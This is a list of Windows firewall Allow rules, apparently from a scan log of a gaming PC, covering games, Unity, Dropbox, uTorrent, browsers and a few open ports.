FirewallRules: [UDP Query User{526DD237-669E-4CB9-A4E7-B4BC8410935B}D:\cryengine_build_pc_v3_5_8_2310_freesdk\bin64\editor.exe] => (Allow) D:\cryengine_build_pc_v3_5_8_2310_freesdk\bin64\editor.exe
FirewallRules: [{D000ADEC-DA7B-43C6-8941-462C84FE2D6E}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{A91FBBC4-C133-4A9A-B1F3-DC6DE1D860B0}D:\program files (x86)\steam\steamapps\common\total war rome ii\rome2.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\total war rome ii\rome2.exe
FirewallRules: [UDP Query User{CAA5062A-E803-4254-948A-8D43824B6173}D:\program files (x86)\steam\steamapps\common\total war rome ii\rome2.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\total war rome ii\rome2.exe
FirewallRules: [{686B1DFA-C5BD-4D5A-8A15-517B23E3D512}] => (Allow) C:\Users\King\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{043313D4-D851-490E-872D-A265F2757C1C}] => (Allow) C:\Users\King\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{045302F9-77F1-4201-86DA-8C6EA8206703}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\ARMA 2 Operation Arrowhead\Expansion\beta\arma2oa.exe
FirewallRules: [{C4FF778D-8F27-42B0-AE0D-0CAB720D8FFB}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\ARMA 2 Operation Arrowhead\Expansion\beta\arma2oa.exe
FirewallRules: [TCP Query User{A873E998-B8EB-484A-B9DF-B078497DD88F}C:\program files\java\jre7\bin\javaw.exe] => (Allow) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{E6266210-0691-4925-8E8A-53EE1F134B3D}C:\program files\java\jre7\bin\javaw.exe] => (Allow) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [TCP Query User{6C25E365-35B7-4FE5-8DC3-8235FC898835}C:\program files (x86)\java\jre7\bin\java.exe] => (Allow) C:\program files (x86)\java\jre7\bin\java.exe
FirewallRules: [UDP Query User{BE6F0CF2-8185-4D2C-925F-093B257EF769}C:\program files (x86)\java\jre7\bin\java.exe] => (Allow) C:\program files (x86)\java\jre7\bin\java.exe
FirewallRules: [{56740D8F-D5F6-4E35-8FFB-8E0560AC32FD}] => (Allow) LPort=1935
FirewallRules: [{0D1F6E19-36C1-427F-BE6C-408C9188964D}] => (Allow) LPort=1935
FirewallRules: [{D27878B0-0420-436E-8B15-13D61DFB64BE}] => (Allow) LPort=1935
FirewallRules: [{B9A5CD33-BF5C-40BF-B9C0-EC6ED6230944}] => (Allow) C:\Program Files (x86)\CheckPoint\ZoneAlarm\vsmon.exe
FirewallRules: [{42338679-9E69-4FCA-8525-2AF1069807EB}] => (Allow) C:\Program Files (x86)\CheckPoint\ZoneAlarm\vsmon.exe
FirewallRules: [{32C4FD29-DDAB-4ABF-838C-2641A1E6C913}] => (Allow) C:\Program Files (x86)\CheckPoint\ZoneAlarm\vsmon.exe
FirewallRules: [{22D33B98-AB47-4470-9DDD-45D78D6896C3}] => (Allow) C:\Program Files (x86)\CheckPoint\ZoneAlarm\vsmon.exe
FirewallRules: [{4C69778C-DF8B-4985-959D-CD3C3D527838}] => (Allow) C:\Users\King\AppData\Local\Google\Google Talk Plugin\googletalkplugin.exe
FirewallRules: [{191B258C-1364-413C-A156-F2C2C25585BD}] => (Allow) C:\Users\King\AppData\Local\Google\Google Talk Plugin\googletalkplugin.exe
FirewallRules: [{8A60B1E6-2BE6-467E-AA3B-1A29E420C5E2}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\SteamVR\drivers\oculus\utils\OculusConfigUtil.exe
FirewallRules: [{3EE2B75A-D6B0-45C1-9A66-D8E5DCA837B8}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\SteamVR\drivers\oculus\utils\OculusConfigUtil.exe
FirewallRules: [{4CB91135-2041-4D10-9D22-1127CA46138B}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\Warface\live\nw.exe
FirewallRules: [{C39665AC-58B4-4490-BBF5-16DA583C39B7}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\Warface\live\nw.exe
FirewallRules: [{3E2F10B6-4503-4AEC-BF2B-BD19C20E4099}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\ARMA 2 Operation Arrowhead\ArmA2OA_BE.exe
FirewallRules: [{63B7E8FB-1AEA-4BEC-9621-55590B91C84D}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\ARMA 2 Operation Arrowhead\ArmA2OA_BE.exe
FirewallRules: [{C8E6E6FB-3E12-48E8-B220-EA87B9E76704}] => (Allow) D:\Program Files (x86)\Winamp\winamp.exe
FirewallRules: [{0213F674-E8D8-4A5A-9226-22E612F986E1}] => (Allow) D:\Program Files (x86)\Winamp\winamp.exe
FirewallRules: [{8F05A078-4A66-40F9-B195-466B7CBB085B}] => (Allow) D:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{7035F6C4-5AB3-4A43-85CC-CF9ADD825A90}] => (Allow) D:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{69C2652B-7B30-4CE1-B1A0-2E2BB84331BC}] => (Allow) D:\Program Files (x86)\steam\Steam.exe
FirewallRules: [{970B5AE6-8E47-45E8-924B-A7357D09FF37}] => (Allow) D:\Program Files (x86)\steam\Steam.exe
FirewallRules: [{DA415390-53AF-4A2F-8498-9B9DD1E62FD6}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Skyrim\SkyrimLauncher.exe
FirewallRules: [{A7FB052D-D286-4D0D-98C9-90488A33CCE5}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Skyrim\SkyrimLauncher.exe
FirewallRules: [{A419E92B-4480-441F-982E-5911B575E654}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Grand Theft Auto IV\GTAIV\LaunchGTAIV.exe
FirewallRules: [{8EDBFE72-9359-4DDC-8CFB-D48E3D724F1D}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Grand Theft Auto IV\GTAIV\LaunchGTAIV.exe
FirewallRules: [{CB2E97B0-7A5C-451B-AB9A-7407181EA8EC}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Dreamfall Chapters\Dreamfall Chapters.exe
FirewallRules: [{D81CE293-BD6D-4FA3-B829-FDD98304B5C5}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Dreamfall Chapters\Dreamfall Chapters.exe
FirewallRules: [{8DFC9376-7DA8-4C8D-81D5-C01F9D415D34}] => (Allow) LPort=27016
FirewallRules: [{5C7F6878-24C4-4D55-8ED6-9698AF3AD1BD}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Total War Rome II\launcher\launcher.exe
FirewallRules: [{83555FF6-292E-49CE-BC99-452285CCE9EA}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Total War Rome II\launcher\launcher.exe
FirewallRules: [{0D070C38-8B83-430D-8511-6D62601A30F9}] => (Allow) D:\Program Files (x86)\EaseUS\Todo Backup\bin\Agent.exe
FirewallRules: [{FFAE59A3-28EA-4611-9D8A-09613B193A2E}] => (Allow) D:\Program Files (x86)\EaseUS\Todo Backup\bin\TodoBackupService.exe
FirewallRules: [{B3C28A1C-26C3-4B0D-A03F-621B6C8F2D92}] => (Allow) D:\Program Files (x86)\EaseUS\Todo Backup\bin\TodoBackupService.exe
FirewallRules: [{A94B644F-CFF3-4B1C-872A-4ECDB94E238D}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{F6CB4B8A-1BD4-4C10-868D-03DE96B557BA}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{721A7CDB-EC33-4381-AAA0-F74385149377}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{2C790162-FED4-408F-B33D-AC941633C960}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{553FC32E-BAE1-4ED2-BAB8-E4257ED11D61}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\ARMA 2 Operation Arrowhead\DLCsetup\PMC\datacachepreprocessor.exe
FirewallRules: [{E158C863-E699-4D4C-9C9F-17C1199E86DC}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\ARMA 2 Operation Arrowhead\DLCsetup\PMC\datacachepreprocessor.exe
FirewallRules: [{952C7F75-C5C8-46D2-8C99-089B6AD53FA4}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\ARMA 2 Operation Arrowhead\DLCsetup\BAF\datacachepreprocessor.exe
FirewallRules: [{C518AF8A-8A1D-4900-81CF-7D61340355E2}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\ARMA 2 Operation Arrowhead\DLCsetup\BAF\datacachepreprocessor.exe
FirewallRules: [{FA18EE3A-06E8-437C-BC77-4DCE0797BBD7}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Arma 2\arma2.exe
FirewallRules: [{B8DA9097-3D52-410A-9D70-460A1BBB58CB}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Arma 2\arma2.exe
FirewallRules: [{EA3A0740-A4D8-4937-A1A3-57B5668915AC}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{50C781F4-86E3-40FC-AD2A-76B273087F58}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{B1E411DB-AA9B-4990-8DE8-6A1ADA6E1A8B}] => (Allow) C:\SteamLibrary\steamapps\common\Arma 3\arma3.exe
FirewallRules: [{D0527DD2-96E0-44AC-8A2C-611D10122D6F}] => (Allow) C:\SteamLibrary\steamapps\common\Arma 3\arma3.exe
FirewallRules: [{0D028FF7-6A0E-4AB3-991E-B1DB6BF96117}] => (Allow) C:\SteamLibrary\steamapps\common\Arma 3\arma3launcher.exe
FirewallRules: [{D9B829C8-F337-4084-A047-ADBFD9D29B44}] => (Allow) C:\SteamLibrary\steamapps\common\Arma 3\arma3launcher.exe
FirewallRules: [{5C3EDD6C-5A88-49DB-BB52-8867EA59F523}] => (Allow) D:\Program Files (x86)\Origin Games\The Sims 4\Game\Bin\TS4.exe
FirewallRules: [{F650729A-8E98-4270-8197-70DAE9006F4A}] => (Allow) D:\Program Files (x86)\Origin Games\The Sims 4\Game\Bin\TS4.exe
FirewallRules: [{C9927348-99DE-4AD8-9E87-68336559B1EC}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Counter-Strike Global Offensive\bin\SDKLauncher.exe
FirewallRules: [{62A69FC2-3CF0-4900-BDD0-33838A6DF5B1}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Counter-Strike Global Offensive\bin\SDKLauncher.exe
FirewallRules: [TCP Query User{37B4A75B-6DA9-43C2-9F28-D580C887C4EF}C:\program files\java\jre7\bin\java.exe] => (Allow) C:\program files\java\jre7\bin\java.exe
FirewallRules: [UDP Query User{635DFB92-9DE7-4F24-8E81-DB6019B3EB89}C:\program files\java\jre7\bin\java.exe] => (Allow) C:\program files\java\jre7\bin\java.exe
FirewallRules: [TCP Query User{69B86087-81B8-438A-ADF8-18DB5FA0B9F2}R:\program files (x86)\ea games\mohaa\mohaa.exe] => (Allow) R:\program files (x86)\ea games\mohaa\mohaa.exe
FirewallRules: [UDP Query User{F1AB9636-09C6-4FB5-A7A2-E927F8148519}R:\program files (x86)\ea games\mohaa\mohaa.exe] => (Allow) R:\program files (x86)\ea games\mohaa\mohaa.exe
FirewallRules: [{576BAB11-6F1D-4342-BD3A-CC365C8B5AF1}] => (Allow) R:\SteamLibrary\steamapps\common\SourceSDK\bin\SDKLauncher.exe
FirewallRules: [{F363D4A9-1DFE-4562-AE6E-EBDCA325B371}] => (Allow) R:\SteamLibrary\steamapps\common\SourceSDK\bin\SDKLauncher.exe
FirewallRules: [TCP Query User{33DB4C35-22F4-4B52-A0FC-DB9C85C3A7CF}D:\program files (x86)\electronic arts\crytek\crysis wars\bin64\crysis.exe] => (Allow) D:\program files (x86)\electronic arts\crytek\crysis wars\bin64\crysis.exe
FirewallRules: [UDP Query User{AC5CC42E-5EBF-4B73-B224-C98D3F3F3406}D:\program files (x86)\electronic arts\crytek\crysis wars\bin64\crysis.exe] => (Allow) D:\program files (x86)\electronic arts\crytek\crysis wars\bin64\crysis.exe
FirewallRules: [{D8CE2171-CE13-4E9C-BFBD-42668160B39F}] => (Allow) R:\Program Files (x86)\Origin Games\Mass Effect\Binaries\MassEffect.exe
FirewallRules: [{D34F8F4D-36D9-4C09-9001-C3DCB4750760}] => (Allow) R:\Program Files (x86)\Origin Games\Mass Effect\Binaries\MassEffect.exe
FirewallRules: [TCP Query User{EEC974FE-FD66-4F26-906D-F27CF73CC277}R:\program files (x86)\unity\editor\unity.exe] => (Allow) R:\program files (x86)\unity\editor\unity.exe
FirewallRules: [UDP Query User{911A57C0-2C2C-4EC6-80F2-C81AA1A322B7}R:\program files (x86)\unity\editor\unity.exe] => (Allow) R:\program files (x86)\unity\editor\unity.exe
FirewallRules: [TCP Query User{0E164AF4-9371-4ADC-937D-5FC1CA1B7514}D:\program files\allegorithmic\bitmap2material\3.x\bitmap2material.exe] => (Allow) D:\program files\allegorithmic\bitmap2material\3.x\bitmap2material.exe
FirewallRules: [UDP Query User{4C613560-0578-4257-AC3C-D5BE7CD8AAC7}D:\program files\allegorithmic\bitmap2material\3.x\bitmap2material.exe] => (Allow) D:\program files\allegorithmic\bitmap2material\3.x\bitmap2material.exe
FirewallRules: [TCP Query User{D0872996-1ACB-47C6-A914-D9BF59CFCC3D}R:\program files\unity\editor\unity.exe] => (Allow) R:\program files\unity\editor\unity.exe
FirewallRules: [UDP Query User{ACB786F3-182E-4B04-8EC4-92C4AEE48669}R:\program files\unity\editor\unity.exe] => (Allow) R:\program files\unity\editor\unity.exe
FirewallRules: [TCP Query User{C8194FEF-C873-43A2-9D69-EE3C55E949A5}R:\mech_game\mech game\mech_game.exe] => (Allow) R:\mech_game\mech game\mech_game.exe
FirewallRules: [UDP Query User{5ECACB08-D4AC-4D4E-9971-CA366093E96E}R:\mech_game\mech game\mech_game.exe] => (Allow) R:\mech_game\mech game\mech_game.exe
FirewallRules: [TCP Query User{390A7C8C-A2F6-49DB-8D32-BD5252CBA2B8}C:\program files (x86)\mozilla firefox\plugin-container.exe] => (Allow) C:\program files (x86)\mozilla firefox\plugin-container.exe
FirewallRules: [UDP Query User{A7F39972-CF54-4509-98C5-1880F3E23B59}C:\program files (x86)\mozilla firefox\plugin-container.exe] => (Allow) C:\program files (x86)\mozilla firefox\plugin-container.exe
FirewallRules: [TCP Query User{FFC28CFE-6626-4DD8-9B78-FA741047D8BB}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{4F9E5C9E-08CD-4B58-8A92-A86319F9FFD0}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [{D1C4F2FA-875C-4EA8-AD01-D47EE0CBE4B8}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\SteamVR\demo\bin\win32\hellovr_sdl.exe
FirewallRules: [{12007852-4486-46A9-88B7-6A5C7EF8353B}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\SteamVR\demo\bin\win32\hellovr_sdl.exe
FirewallRules: [TCP Query User{91DBB666-1E87-4C93-A483-3806680C8896}D:\program files (x86)\trillian\trillian.exe] => (Allow) D:\program files (x86)\trillian\trillian.exe
FirewallRules: [UDP Query User{8DECB21E-0C18-45C8-88F0-0C8097A7A727}D:\program files (x86)\trillian\trillian.exe] => (Allow) D:\program files (x86)\trillian\trillian.exe
FirewallRules: [TCP Query User{9AAFE1D3-900D-47C6-9D40-66D1A1CC802C}R:\program files\rockstar games\grand theft auto v\gta5.exe] => (Allow) R:\program files\rockstar games\grand theft auto v\gta5.exe
FirewallRules: [UDP Query User{73331B2D-6D75-4482-8820-27A4A091107F}R:\program files\rockstar games\grand theft auto v\gta5.exe] => (Allow) R:\program files\rockstar games\grand theft auto v\gta5.exe
FirewallRules: [{9339C4AA-00B8-47AB-B66E-B29A2BBB1F79}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{C5BF7154-2F15-48F6-8A94-3EF0F85D437B}] => (Allow) LPort=2869
FirewallRules: [{40350AB1-C51C-4BF8-9BB9-C6D59348F362}] => (Allow) LPort=1900
FirewallRules: [{BD44A386-5C0E-4B9D-8192-60319B23E59D}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\SteamVR\tools\bin\win32\vrmonitor.exe
FirewallRules: [{67EFDA1C-327F-4532-80B3-83ADF3130446}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\SteamVR\tools\bin\win32\vrmonitor.exe
FirewallRules: [{F97ADAE6-FDDF-4E46-B26F-539B3C4F7794}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Alien Isolation\AI.exe
FirewallRules: [{6ADD9A4A-6469-4D0C-8928-42DFF1422ED6}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Alien Isolation\AI.exe
FirewallRules: [{C5917053-F117-49F5-998B-36063E4A2623}] => (Allow) C:\SteamLibrary\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{76ED3EA8-BC3F-47BD-9843-FCD7C0D2746C}] => (Allow) C:\SteamLibrary\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{6BAC5308-AECA-4DFE-95B4-BDD714B1F412}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\dota 2 beta\dota.exe
FirewallRules: [{13994230-5EAF-4716-9D10-C33C01086648}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\dota 2 beta\dota.exe
FirewallRules: [TCP Query User{702A19EA-7FC4-438D-BE15-BD4CAD457087}D:\program files (x86)\steam\steamapps\common\dota 2 beta\game\bin\win32\dota2.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\dota 2 beta\game\bin\win32\dota2.exe
FirewallRules: [UDP Query User{ACAFE845-95BF-48BE-A03C-AF73803FC984}D:\program files (x86)\steam\steamapps\common\dota 2 beta\game\bin\win32\dota2.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\dota 2 beta\game\bin\win32\dota2.exe
FirewallRules: [{6E8D4E91-E598-4778-9F29-6CE9AE36E7D4}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\dota 2 beta\game\bin\win64\dota2cfg.exe
FirewallRules: [{62FFD780-17C5-4E5B-A30F-DA07F58C37EB}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\dota 2 beta\game\bin\win64\dota2cfg.exe
FirewallRules: [{C85EBC1E-67A1-4B4F-BBB7-1BA73F6191AD}] => (Allow) C:\Program Files (x86)\Common Files\Acronis\SyncAgent\syncagentsrv.exe
FirewallRules: [{63107B63-68F7-4729-B57C-A2FC67ADF879}] => (Allow) C:\Program Files (x86)\Common Files\Acronis\SyncAgent\syncagentsrv.exe
FirewallRules: [TCP Query User{1A468DE0-EB48-4C47-9847-3D29016A3672}R:\program files\unity\monodevelop\bin\monodevelop.exe] => (Allow) R:\program files\unity\monodevelop\bin\monodevelop.exe
FirewallRules: [UDP Query User{8B76DFE0-D9E5-418F-B1DF-CF01F0AD54FF}R:\program files\unity\monodevelop\bin\monodevelop.exe] => (Allow) R:\program files\unity\monodevelop\bin\monodevelop.exe
FirewallRules: [TCP Query User{31BF8F9D-AC7E-4AA4-BA6F-FBF23ED811AC}R:\networkstarter\networkstarter.exe] => (Allow) R:\networkstarter\networkstarter.exe
FirewallRules: [UDP Query User{9DF5C112-BE66-4559-A7F0-27BD8853DC5D}R:\networkstarter\networkstarter.exe] => (Allow) R:\networkstarter\networkstarter.exe
FirewallRules: [TCP Query User{23D999FE-BFE4-484D-AE68-C8D2D0A2639B}C:\users\king\desktop\mechgame\mech_game.exe] => (Allow) C:\users\king\desktop\mechgame\mech_game.exe
FirewallRules: [UDP Query User{2C444C14-15E7-4080-94A3-B92C5951FB5D}C:\users\king\desktop\mechgame\mech_game.exe] => (Allow) C:\users\king\desktop\mechgame\mech_game.exe
FirewallRules: [TCP Query User{74B5D83D-7220-42B1-9802-C2DD7235A16E}C:\users\king\appdata\roaming\dropbox\bin\dropbox.exe] => (Allow) C:\users\king\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [UDP Query User{BF1F6585-0EE5-4923-83FC-94BB654ACDA3}C:\users\king\appdata\roaming\dropbox\bin\dropbox.exe] => (Allow) C:\users\king\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [{035E7EF0-B4F1-4B7D-AB6D-49DFBF138642}] => (Allow) R:\SteamLibrary\steamapps\common\killingfloor2\Binaries\Win64\KFGame.exe
FirewallRules: [{4AF5A2C0-A602-4117-B4B3-8F0D2A626E0B}] => (Allow) R:\SteamLibrary\steamapps\common\killingfloor2\Binaries\Win64\KFGame.exe
FirewallRules: [{C1705A37-36D7-47AB-B414-E334EFF30476}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\BioShock Infinite\Binaries\Win32\BioShockInfinite.exe
FirewallRules: [{E0A76205-97A7-434C-A238-BAD43E4656C3}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\BioShock Infinite\Binaries\Win32\BioShockInfinite.exe
FirewallRules: [{E69B2FF9-2BFE-4F5E-B635-57ED2A8AF9E0}] => (Allow) R:\SteamLibrary\steamapps\common\killingfloor2\Binaries\Win64\KFGame.exe
FirewallRules: [{9CB93BEB-A02D-4C46-B21E-C01FE9717E38}] => (Allow) R:\SteamLibrary\steamapps\common\killingfloor2\Binaries\Win64\KFGame.exe
FirewallRules: [TCP Query User{2913D355-97F8-4A88-927F-46A0B922A071}D:\program files (x86)\mirc\mirc.exe] => (Allow) D:\program files (x86)\mirc\mirc.exe
FirewallRules: [UDP Query User{E3354716-66FA-499E-87C3-325DD14A1F87}D:\program files (x86)\mirc\mirc.exe] => (Allow) D:\program files (x86)\mirc\mirc.exe
FirewallRules: [TCP Query User{310E8940-C14E-4A0F-8715-42241174F30E}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [UDP Query User{B0A9FF95-0324-46C5-B8ED-0C0162556FF0}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [{7056697D-2EA5-4BEE-A0AF-60D7950C3FFB}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\PlanetSide 2\LaunchPad.exe
FirewallRules: [{D4479628-2A67-4859-A5FD-A2C76C9AFC75}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\PlanetSide 2\LaunchPad.exe
FirewallRules: [TCP Query User{23089EEF-E634-4899-98F7-8ECDF432F679}R:\program files\rockstar games\grand theft auto v\gta5.exe] => (Allow) R:\program files\rockstar games\grand theft auto v\gta5.exe
FirewallRules: [UDP Query User{996D63D0-F4FD-4239-B50B-75F775D9824B}R:\program files\rockstar games\grand theft auto v\gta5.exe] => (Allow) R:\program files\rockstar games\grand theft auto v\gta5.exe
FirewallRules: [TCP Query User{955A64A3-0B29-4C72-8007-FBEE589DE12F}D:\program files (x86)\electronic arts\crytek\crysis wars\bin64\crysis.exe] => (Allow) D:\program files (x86)\electronic arts\crytek\crysis wars\bin64\crysis.exe
FirewallRules: [UDP Query User{90579E89-7A13-4AED-8D4B-33BB82E44375}D:\program files (x86)\electronic arts\crytek\crysis wars\bin64\crysis.exe] => (Allow) D:\program files (x86)\electronic arts\crytek\crysis wars\bin64\crysis.exe
FirewallRules: [TCP Query User{E23D88E6-C831-4F79-901A-8BF31AE76723}D:\program files (x86)\steam\steamapps\common\planetside 2\planetside2_x64.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\planetside 2\planetside2_x64.exe
FirewallRules: [UDP Query User{5645BF1C-86A9-431A-8B2F-DD2FAC0386F0}D:\program files (x86)\steam\steamapps\common\planetside 2\planetside2_x64.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\planetside 2\planetside2_x64.exe
FirewallRules: [TCP Query User{D2F61D2E-C476-4110-B4D1-F329EB9DA54F}R:\program files\unity\editor\unity.exe] => (Allow) R:\program files\unity\editor\unity.exe
FirewallRules: [UDP Query User{500B7E9D-016B-49B6-8C94-5D331D4AAC44}R:\program files\unity\editor\unity.exe] => (Allow) R:\program files\unity\editor\unity.exe
FirewallRules: [{3B8C0169-A535-4AEC-9F41-CE7D53B6C35C}] => (Allow) C:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\IDE\devenv.exe
FirewallRules: [TCP Query User{20A77DC0-0BE9-4BC3-9029-4DF1F130AE53}C:\users\king\desktop\mechgame\mech_game.exe] => (Allow) C:\users\king\desktop\mechgame\mech_game.exe
FirewallRules: [UDP Query User{CBA1C25E-F366-41F9-A3D9-5ED748CF080E}C:\users\king\desktop\mechgame\mech_game.exe] => (Allow) C:\users\king\desktop\mechgame\mech_game.exe
FirewallRules: [TCP Query User{8A537426-520D-4BF1-B1CB-5BAC9943F0FF}D:\program files\unity\editor\unity.exe] => (Allow) D:\program files\unity\editor\unity.exe
FirewallRules: [UDP Query User{94DD2762-B1BA-4894-908E-1FC70028B2E8}D:\program files\unity\editor\unity.exe] => (Allow) D:\program files\unity\editor\unity.exe
FirewallRules: [TCP Query User{FD6B2D83-BDAC-4D9E-9587-34CB6EBA8A90}C:\users\king\appdata\roaming\dropbox\bin\dropbox.exe] => (Allow) C:\users\king\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [UDP Query User{8BB90BBD-0C3D-4ED6-B2FB-A4DEB5CDF987}C:\users\king\appdata\roaming\dropbox\bin\dropbox.exe] => (Allow) C:\users\king\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [{8B311CA8-F6AF-4745-BBB1-D77DF1E9D44E}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\counter-strike source\hl2.exe
FirewallRules: [{19710464-30DD-4781-A66B-6149B9242EC5}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\counter-strike source\hl2.exe
FirewallRules: [{102C732D-1530-4108-A8FD-4B70816306FE}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{45815966-25B3-4FB3-8C7E-F87B224DE68B}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{A074EB64-5286-4924-AA51-A6CE528D0685}D:\program files (x86)\renegade x\binaries\win32\udk.exe] => (Allow) D:\program files (x86)\renegade x\binaries\win32\udk.exe
FirewallRules: [UDP Query User{1F2F085C-B4E1-4DA1-98F2-65F507FCBD4D}D:\program files (x86)\renegade x\binaries\win32\udk.exe] => (Allow) D:\program files (x86)\renegade x\binaries\win32\udk.exe
FirewallRules: [TCP Query User{5B5B90E1-B4B9-4E26-9A64-3F9AE8AAA65A}D:\program files (x86)\steam\steamapps\common\grand theft auto iv\gtaiv\gtaiv.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\grand theft auto iv\gtaiv\gtaiv.exe
FirewallRules: [UDP Query User{729FBE94-7305-42EF-BCCB-68E73EC15DB0}D:\program files (x86)\steam\steamapps\common\grand theft auto iv\gtaiv\gtaiv.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\grand theft auto iv\gtaiv\gtaiv.exe
FirewallRules: [{4B98E4CE-5605-4563-BDA1-7205A2EC56F8}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\ShadowOfMordor\x64\ShadowOfMordor.exe
FirewallRules: [{A1933344-6700-41EE-BB83-4A170D2E5581}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\ShadowOfMordor\x64\ShadowOfMordor.exe
FirewallRules: [TCP Query User{FC876441-D452-48FB-B1A5-3135EDD120DB}D:\program files (x86)\steam\steamapps\common\total war attila\attila.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\total war attila\attila.exe
FirewallRules: [UDP Query User{692AC8BE-EF29-42C9-A015-8DF06A929944}D:\program files (x86)\steam\steamapps\common\total war attila\attila.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\total war attila\attila.exe
FirewallRules: [{C925ACC9-0F56-4899-A031-8E8D3B86E061}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Left 4 Dead 2\left4dead2.exe
FirewallRules: [{43A77342-C5F6-4D8B-B9FD-06EF79FEA828}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Left 4 Dead 2\left4dead2.exe
FirewallRules: [{E514ED43-6BF3-462A-BFE9-D5C9E485D9C4}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{60F1D7EC-B8E4-4418-AF91-BC9C14A58ADE}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{2ED9C384-7BB6-482C-83D1-0A1A5BCF10E7}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{9358AB1F-9A7C-4124-8BCA-AD912B32DF5D}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{29F23503-30F1-4C59-9C81-970C456CC529}] => (Allow) C:\Program Files (x86)\Battlelog Web Plugins\Sonar\0.70.4\SonarHost.exe
FirewallRules: [{A0CC1B38-BC1A-44EA-AD20-05ABB1B8CB5F}] => (Allow) C:\Program Files (x86)\Battlelog Web Plugins\Sonar\0.70.4\SonarHost.exe
FirewallRules: [TCP Query User{F4D34E10-C30B-41D2-A948-D0FE9D13C9E8}D:\origin games\battlefield 4\bf4.exe] => (Allow) D:\origin games\battlefield 4\bf4.exe
